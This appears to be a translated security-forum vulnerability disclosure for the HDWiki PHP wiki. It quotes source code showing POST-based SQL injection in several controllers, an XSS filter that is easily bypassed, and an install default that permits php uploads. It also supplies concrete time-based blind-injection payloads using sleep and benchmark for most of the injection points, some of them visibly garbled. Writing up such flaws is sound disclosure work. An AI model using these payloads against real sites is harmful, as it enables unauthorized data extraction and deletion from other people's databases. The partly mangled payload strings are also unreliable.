HDWiki has become more secure after the scrutiny of earlier experts. I could only find a few blind-injection points and some XSS issues. PS: Do not ignore PSS: the vulnerability is your own, rank is a swordsman, so ..... you know ~. ~

Detailed Description: After the scrutiny of earlier experts it has become safer and safer. GET parameters are filtered against a list of keywords, and GET-based injection is almost impossible, so I only found POST-based issues.

1. control/user.php
177 function doaegis() {
178     $id = $this->post['id']; // vulnerable
179     if (empty($id)) {
180         $this->message(-1, '', 2);
181     }
182     if ($_ENV["comment"]->is_in_cookie('aegis', $id)) {
183         $this->message(-2, '', 2);
184     }
185     $_ENV["comment"]->update_field('aegis', 1, $id, 0);
186     $this->message($id, '', 2);
187 }
model/comment.class.php
56 function update_field($field, $value, $id, $type = 1) {
57     if ($type) {
58         $SQL = "UPDATE " . DB_TABLEPRE . "comment SET $field = '$value' WHERE id = $id";
59     } else {
60         $SQL = "UPDATE " . DB_TABLEPRE . "comment SET $field = $field + $value WHERE id = $id";
61     }
62     $this->db->query($SQL);
63 }
Both branches interpolate `$id` straight into the WHERE clause without casting it to an integer, so the POST value reaches the query unchanged.
Submit id = 1 and if (substr (select 1), 2189) = 1, sleep (10), 1) to implement blind injection.

2. function dooppose() {
190     $id = $this->post['id']; // vulnerable
191     if (empty($id)) {
192         $this->message(-1, '', 2);
193     }
194     if ($_ENV["comment"]->is_in_cookie('oppose', $id)) {
195         $this->message(-2, '', 2);
196     }
197     $_ENV["comment"]->update_field('oppose', 1, $id, 0);
198     $this->message($id, '', 2);
199 }
Same as above.

3. control/gift.php
51 function doapply() {
52     /* Get the user submitted parameter */
53     $gid = $this->post['gid']; // gift id // vulnerable
.....................
61
62     $gift = $_ENV['gift']->get($gid); // current gift
model/gift.class.php
46 function get($id) {
47     return $this->db->fetch_first("SELECT * FROM " . DB_TABLEPRE . "gift WHERE id = " .
$id);
48 }
Submit gid = 1 and if (substr (select 1), 1000000000) = 1, benchmark (534534, md5 (), 1)

4. control/doc.php
1021 function dodelsave() {
1022     $aid = isset($this->get[2]) ? $this->get[2] : '';
1023     if (empty($aid)) {
1024         $aid = $this->post['checkid']; // vulnerable
1025         $num = count($aid);
1026         if ($num > 0) {
1027             $aids = '';
1028             for ($i = 0; $i < $num; $i++) {
1029                 $aids .= $aid[$i] . ',';
1030             }
1031             $aids = substr($aids, 0, -1);
1032             $_ENV['doc']->del_autosave($aids);
model/doc.class.php
88 function del_autosave($aid, $uid = '', $did = '') {
89     if ($aid != '') {
90         $SQL = "DELETE FROM " . DB_TABLEPRE . "autosave WHERE aid in ($aid)";
91     } elseif ($uid != '' && $did != '') {
92         $SQL = "DELETE FROM " . DB_TABLEPRE . "autosave WHERE uid = '$uid' AND did = '$did'";
93     } else {
94         return false;
95     }
96     return $this->db->query($SQL);
97 }
The elements of checkid[] are only joined with commas; nothing checks that they are numeric before they reach the IN (...) list.
checkid [] = 1) or if (substr (select 1), 1, 1) = 1, benchmark (1000000000, md5 (534534), 1

5. control/user.php
166 function doremove() {
167     $messageids = '';
168     if ($this->get[2] == 'sing') {
169         $alltype = array(1, 2, 3);
170         if (is_numeric($this->post['id']) && in_array($this->post['type'], $alltype)) {
171             $_ENV['pms']->update_pms($this->post['id'], $this->post['type']);
172         }
173     } else {
174         $removeid = $this->post['checkid']; // vulnerable
175         $num = count($removeid);
176         $allowlist = array('inbox', 'outbox', 'drafs');
177         if (is_array($removeid) && $num >= 1 && in_array($this->get[3], $allowlist)) {
178             switch ($this->get[3]) {
179                 case inbox:
180                     $type = 1;
181                     break;
182                 case outbox:
183                     $type = 2;
184                     break;
185                 case drafts:
186                     $type = 3;
187                     break;
188             }
189             for ($i = 0; $i < $num; $i++) {
190                 $messageids .= $removeid[$i] . ',';
191             }
192             $messageids = substr($messageids, 0, -1);
193             $result = $_ENV['pms']->update_pms($messageids, $type);
model/pms.class.
php
127 function update_pms($messageids, $type) {
128     $id = strpos($messageids, ',') ? substr($messageids, 0, strpos($messageids, ',')) : $messageids;
129     $pms = $this->get_pms($id);
130     if ($pms['delstatus'] == $type || $type == 3) {
131         $result = $this->remove($messageids);
132     } else {
133         $type = ($type == 2) ? 1 : 2;
134         $result = $this->db->query("UPDATE " . DB_TABLEPRE . "pms SET delstatus = '$type' WHERE id in ($messageids)");
135     }
136     return $result;
137 }
139 function remove($messageids) {
140     return ($this->db->query("delete from " . DB_TABLEPRE . "pms WHERE id in ($messageids)"));
141 }

XSS: the entry edit body text goes through the following filter (source code).
index.php?doc-view-51
$doc['content'] = string::stripscript($_ENV['doc']->replace_danger_word($this->post['content']));
227 function stripscript($string) {
228     $pregfind = array("/<script.*>.*<\/script>/siU", '/on(mousewheel|mouseover|click|load|onload|submit|focus|blur)="[^"]*"/i');
229     $pregreplace = array('', '',);
230     $string = preg_replace($pregfind, $pregreplace, $string);
231     return $string;
232 }
Only the sensitive words, the <script> tag and the listed on* attributes are removed from the body, so other dangerous tags and attributes pass through; this is a minor issue.

/install.php:578: ('attachment_type', 'jpg|jpeg|bmp|gif|png|gz|bz2|zip|rar|doc|ppt|mp3|xls|txt|swf|flv|php|pdf'), so during installation php is also included in the file formats that can be uploaded. Attachments are not uploadable by default, so this is not very harmful. It seems a bit difficult.

Proof of vulnerability:
Solution: :)